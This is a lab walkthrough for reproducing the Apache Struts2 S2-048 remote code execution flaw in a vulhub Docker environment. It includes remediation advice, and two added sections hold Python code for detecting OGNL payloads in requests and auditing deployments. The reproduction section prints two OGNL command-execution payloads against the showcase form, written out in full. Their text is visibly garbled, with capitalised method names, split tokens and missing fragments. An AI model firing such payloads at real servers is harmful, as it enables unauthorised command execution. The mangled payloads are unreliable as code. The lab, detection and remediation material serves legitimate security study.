2025-02-22 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through reproducing the Apache Struts2 S2-048 remote code execution vulnerability in a lab environment, covering the cause, the affected scope, the environment setup, the reproduction steps and the fix.
0x00 Introduction
The Struts2 framework is an open source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the design of WebWork as its core, absorbs some of the strengths of the Struts framework, and provides a cleaner web application framework for implementing the MVC design pattern.
0x01 Vulnerability overview
The issue affects the Apache Struts2 2.3.x series when the struts2-struts1-plugin plug-in is enabled and the struts2-showcase application is present. When ActionMessage receives parameter data that the client can control, the data is concatenated and passed on without proper handling, which leads to arbitrary code execution.
0x02 Scope of impact
Apache Struts 2.3.x series versions with the struts2-struts1-plugin plug-in enabled.
0x03 Environment setup
1. Building Apache Struts2 yourself is complicated, so this vulnerable environment is built with the docker environment from vulhub.
Download address: https://github.com/vulhub/vulhub
2. After the download completes, unpack it, change into the s2-048 directory and start the vulnerable environment.
cd vulhub-master/struts2/s2-048    // enter the directory
docker-compose up -d    // start the lab environment
3. Use docker ps to check that it started successfully.
4. Open http://your-ip:8080/hello.action in the browser; if the page loads, the environment has been built.
0x04 Vulnerability reproduction
1. Open the following link in the browser to reach the vulnerable page:
http://192.168.3.160:8080/integration/saveGangster.action
2. Enter ${1q1} in the first form field, "Gangster Name", fill in the other fields with anything, and click submit; the response shows that the OGNL expression was executed.
2. In "Gangster Name", replace ${1q1} with the following command-execution payload:
% {(# dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (# _ memberAccess? (# _ memberAccess=#dm): (# container=#context ['com.opensymphony.xwork2.ActionContext.container']). (# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ognlUtil.getExcludedPackageNames (). Clear ()). (# ognlUtil.getExcludedClasses (). Clear ()). (# context.setMemberAccess (# dm). .commons.io.IOUtils @ toString (@ java.lang.Runtime@getRuntime (). Exec ('id'). GetInputStream ()). (# Q)}
3. You can also capture the request with Burp and modify it to carry the command-execution payload.
Note: the payload must be URL-encoded.
% {(# dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (# _ memberAccess? (# _ memberAccess=#dm): (# container=#context ['com.opensymphony.xwork2.ActionContext.container']). (# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ognlUtil.getExcludedPackageNames (). Clear ()). (# ognlUtil.getExcludedClasses (). Clear ()). (# context.setMemberAccess (# dm). (# cmd='id') . (# iswin= (@ java.lang.System@getProperty ('os.name'). ToLowerCase (). Contains (' win'). (# cmds= (# iswin? {'cmd.exe') (# p=new java.lang.ProcessBuilder (# cmds)). (# p.redirectErrorStream (true)). (# process=#p.start ()). (# ros= (@ org.apache.struts2.ServletActionContext@getResponse (). GetOutputStream (). (@ org.apache.commons.io.IOUtils@copy (# process.getInputStream (), # ros)). (# ros.flush ())}
4. The same can be done with automated scripts or graphical tools, which are not demonstrated here.
The tools can be found on GitHub.
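Seen from the monitoring side, the requests in this section stand out once the form body is decoded. The following detection sketch is an added example, not part of the original article: it flags OGNL expressions in form fields using marker strings taken from the payloads quoted above. The form field names and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, quote, unquote_plus

# Strings that appear in the payloads quoted in the article.
OGNL_MARKERS = (
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "#_memberAccess",
    "getExcludedPackageNames",
    "getExcludedClasses",
    "java.lang.Runtime",
    "java.lang.ProcessBuilder",
)
EXPR_OPEN = re.compile(r"[%$]\{")  # OGNL delimiters: %{...} or ${...}
SHOWCASE_PATH = "/integration/saveGangster.action"


def normalise(value, max_rounds=3):
    """Undo repeated URL encoding, then drop whitespace used to split tokens."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", "", value)


def inspect_request(path, body):
    """Return one finding per form field that carries an OGNL expression."""
    findings = []
    for field, raw in parse_qsl(body, keep_blank_values=True):
        text = normalise(raw)
        if not EXPR_OPEN.search(text):
            continue
        hits = [m for m in OGNL_MARKERS if m in text]
        findings.append({
            "field": field,
            "severity": "high" if hits else "probe",
            "markers": hits,
            "showcase_form": path.endswith(SHOWCASE_PATH),
        })
    return findings


# Constructed sample requests (not captured traffic); FRAGMENT is a non-executing
# excerpt of the marker strings, double URL-encoded in the last sample.
FRAGMENT = "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm)}"
SAMPLES = {
    "benign": "name=Tony&age=40&description=boss",
    "probe": "name=%24%7B7%2A7%7D&age=1&description=x",
    "double_encoded": "name=" + quote(quote(FRAGMENT, safe=""), safe="") + "&age=1",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_request(SHOWCASE_PATH, body))
```

Decoding more than once matters because a rule that matches only the raw or singly decoded body misses the double-encoded sample.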
0x05 Remediation recommendations
1. Upgrade to the latest version (recommended).
2. Depending on business needs, disable or delete the \struts-2.3.x\apps\struts2-showcase.war package.
That covers how to reproduce the Apache Struts2 S2-048 remote code execution vulnerability. If you have similar questions, the analysis above can serve as a reference.
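To check whether recommendation 2 has been applied on a server, the deployment directory can be audited for the two conditions named in the overview. This is an added example, not from the original article: it scans WAR files and exploded webapps for a deployed struts2-showcase application and a 2.3.x struts2-struts1-plugin jar. The directory layout, the application name "shop" and the version 2.3.32 are constructed sample values.

```python
import re
import tempfile
import zipfile
from pathlib import Path

PLUGIN_RE = re.compile(r"struts2-struts1-plugin-(2\.3\.[\w.]+)\.jar$")


def jar_names(app):
    """List WEB-INF/lib entries of a .war archive or an exploded webapp directory."""
    if app.is_file() and zipfile.is_zipfile(app):
        with zipfile.ZipFile(app) as war:
            return [n for n in war.namelist() if n.startswith("WEB-INF/lib/")]
    lib = app / "WEB-INF" / "lib"
    return sorted(p.name for p in lib.glob("*.jar")) if lib.is_dir() else []


def audit_webapps(root):
    """Return (app name, reasons) for each webapp matching the S2-048 conditions."""
    findings = []
    for app in sorted(Path(root).iterdir()):
        reasons = []
        if app.name.startswith("struts2-showcase"):
            reasons.append("struts2-showcase application deployed")
        for name in jar_names(app):
            match = PLUGIN_RE.search(name)
            if match:
                reasons.append(f"struts2-struts1-plugin {match.group(1)} present")
        if reasons:
            findings.append((app.name, reasons))
    return findings


def build_sample(root):
    """Create a constructed webapps tree: one flagged WAR, one clean exploded app."""
    root = Path(root)
    with zipfile.ZipFile(root / "struts2-showcase.war", "w") as war:
        war.writestr("WEB-INF/lib/struts2-core-2.3.32.jar", b"")
        war.writestr("WEB-INF/lib/struts2-struts1-plugin-2.3.32.jar", b"")
    lib = root / "shop" / "WEB-INF" / "lib"
    lib.mkdir(parents=True)
    (lib / "struts2-core-2.3.32.jar").write_bytes(b"")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for app, reasons in audit_webapps(tmp):
            print(app, "->", "; ".join(reasons))
```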